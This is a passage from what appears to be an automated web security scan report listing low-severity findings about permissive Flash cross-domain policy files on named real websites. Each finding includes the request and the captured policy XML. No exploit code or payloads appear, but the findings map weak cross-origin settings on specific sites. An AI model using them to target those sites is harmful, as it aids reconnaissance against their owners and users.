Date: Mon, 02 May 2011 00:18:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 18:37:37 GMT
ETag: "300517-2d0-49f52e3555e40"
Accept-Ranges: bytes
Content-Length: 720
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sonymusic.com" />
<allow-access-from domain="sonymusic.com" />
<allow-access-from domain="*.columbiarecords.com" />
<allow-access-from domain="columbiarecords.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.google-analytics.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="windows.dev.boffswana.com.au" />
<allow-access-from domain="*.britneyvideogame.com" />
<allow-access-from domain="femmefatale.britney.com" />
...[SNIP]...
8.94. http://www.cosmeticscop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cosmeticscop.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 02 Jun 2010 16:17:10 GMT
Accept-Ranges: bytes
ETag: "d6a3f8d6f2cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=4cec805f-42ac-463d-a51f-5457eebc586a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close
Content-Length: 470

<cross-domain-policy>
<allow-access-from domain="www.paulaschoice.com" />
<allow-access-from domain="paulaschoice.com" />
<allow-access-from domain="paulaschoice.commercev3.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.totalbeauty.com" />
<allow-access-from domain="totalbeauty.com" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...
8.95. http://www.dotmed.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dotmed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dotmed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:17 GMT
Server: Apache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.dotmed.com"/>
<allow-access-from domain="dotmed-images.s3.amazonaws.com"/>
...[SNIP]...
8.96. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.135.49
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
8.97. http://www.ftjcfx.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...
8.98. http://www.kens5.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kens5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kens5.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 06:47:11 GMT
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/xml;charset=utf-8
Date: Mon, 02 May 2011 00:08:50 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...
8.99. http://www.lavalife.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lavalife.com

Response

HTTP/1.0 200 OK
Date: Sun, 17 Apr 2011 01:22:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 10 Nov 2010 14:25:51 GMT
ETag: "3036422-a6-494b3a25e79c0"
Accept-Ranges: bytes
Content-Length: 166
Content-Type: application/xml
Age: 155936
X-Cache: HIT from www.lavalife.com
Connection: close

<?xml version='1.0'?>
<cross-domain-policy>
   <allow-access-from domain="*.omnidate.net" />
   <allow-access-from domain="*.omnidate.com" />
</cross-domain-policy>
8.100. http://www.lduhtrp.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:18:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...
8.101. http://www.mihomepaper.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mihomepaper.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mihomepaper.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:15 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "1300000017dd54-7f-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 127
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>
8.102. http://www.mynews.in/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mynews.in
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mynews.in

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
Last-Modified: Sun, 03 Oct 2010 11:14:13 GMT
ETag: "2de48fa-d3-491b48710ab40"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross-dom
...[SNIP]...
8.103. http://www.nextworth.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextworth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nextworth.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Jun 2010 17:32:49 GMT
ETag: "14a8008-84-4882398679240"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/xml
Set-Cookie: nx123=APACHE1; path=/
Cache-control: private

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.atlanticfundadministration.com" />
</cross-domain-policy>
8.104. http://www.swarminteractive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swarminteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swarminteractive.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 24 Feb 2010 15:19:24 GMT
ETag: "5a04be-151-4805a30fad700"
Accept-Ranges: bytes
Content-Length: 337
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.swarminteractive.com
...[SNIP]...
<allow-access-from domain="swarminteractive.com" /> <allow-access-from domain="*.swarminteractive.com" />
...[SNIP]...
8.105. http://www.toyotacertified.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toyotacertified.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toyotacertified.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 17:50:54 GMT
ETag: "5f628-505-bd05bb80"
Accept-Ranges: bytes
Content-Length: 1285
Content-Type: application/xml
X-N: S
Date: Sun, 01 May 2011 23:38:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.toyota.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotacertified.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotacertificados.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="mediaweb.jrbassoc.com" secure="false"/>
...[SNIP]...
8.106. http://www.tqlkg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:12 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...
8.107. http://www.villagehatshop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.villagehatshop.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Last-Modified: Thu, 19 Feb 2009 19:38:03 GMT
Accept-Ranges: bytes
Content-Length: 321
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:26:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.villagehatshop.com" />
<allow-access-from domain="villagehatshop.com" />
<allow-access-from domain="*.villagehatshop.com" />
...[SNIP]...
8.108. http://www.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=584
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...
8.109. http://www.whymilk.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whymilk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.whymilk.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 18 Mar 2010 21:08:57 GMT
ETag: "15181c4-409-48219a393ac40"
Accept-Ranges: bytes
Content-Length: 1033
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="promotions.bodybymilk.com"/>
